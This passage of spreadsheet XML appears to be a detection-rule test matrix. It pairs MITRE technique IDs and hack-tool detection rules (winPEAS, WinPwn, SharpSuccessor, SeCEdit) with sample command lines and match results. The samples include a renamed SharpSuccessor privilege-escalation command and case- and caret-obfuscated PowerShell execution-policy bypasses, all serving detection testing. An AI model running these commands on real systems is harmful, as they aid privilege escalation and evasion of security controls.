    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="43" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B160" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C160" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D160" s="43" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E160" s="43" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe C:\Windows\Temp\not_malicious.exe &amp;&amp; C:\Windows\Temp\not_malicious.exe /ADD /imp:Administrator /p:C:\Windows\System32 /ACC:testusEr /n:DnsAdmin</t>
        </is>
      </c>
      <c r="F160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G160" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution (38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J160" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C161" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D161" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E161" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\Temp\legit.dll,#1</t>
        </is>
      </c>
      <c r="F161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I161" s="43" t="n"/>
      <c r="J161" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K161" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C162" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D162" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E162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62" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I162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62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C163" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D163" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E163" s="44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63" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I163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63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C164" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D164" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E164" s="44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64" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I164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64" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C165" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D165" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E165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65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I165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65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="n"/>
      <c r="B166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C166" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D166" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E166" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I166" s="44" t="n"/>
      <c r="J166" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K166" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="n"/>
      <c r="B167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C167" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D167" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E167" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I167" s="44" t="n"/>
      <c r="J167" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K167" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="n"/>
      <c r="B168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C168" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D168" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E168" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J168" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="n"/>
      <c r="B169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C169" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D169" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E169" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H169" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J169" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="44" t="n"/>
      <c r="B170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C170" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D170" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E170" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J170" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="44" t="n"/>
      <c r="B171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C171" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D171" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E171" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J171" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="44" t="n"/>
      <c r="B172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C172" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D172" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E172" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B173" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C173" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D173" s="43" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E173" s="43" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I173" s="43" t="n"/>
      <c r="J173" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K173" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C174" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D174" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E174" s="44" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" /db mytemplate.db</t>
        </is>
      </c>
      <c r="F174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J174" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K174" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C175" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D175" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E175" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /exp^ort /areas SECURITYPOLICY /cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J175" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K175" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C176" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D176" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E176" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\Temp\legit.dll,#1</t>
        </is>
      </c>
      <c r="F176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I176" s="44" t="n"/>
      <c r="J176" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K176" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C177" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D177" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E177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77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H177" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I177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77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C178" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D178" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E178" s="44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78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I178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78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K178" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C179" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D179" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E179" s="44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79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I179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79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K179" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C180" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D180" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E180" s="44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80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="44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80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B181" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C181" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D181" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E181" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F181" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K181" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C182" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D182" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E182" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K182" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B183" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C183" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D183" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E183" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H183" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J183" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C184" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D184" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E184" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J184" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C185" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D185" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E185" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J185" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C186" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D186" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E186" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J186" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C187" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D187" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E187" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I187" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J187" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C188" s="44" t="inlineStr">
        <is>
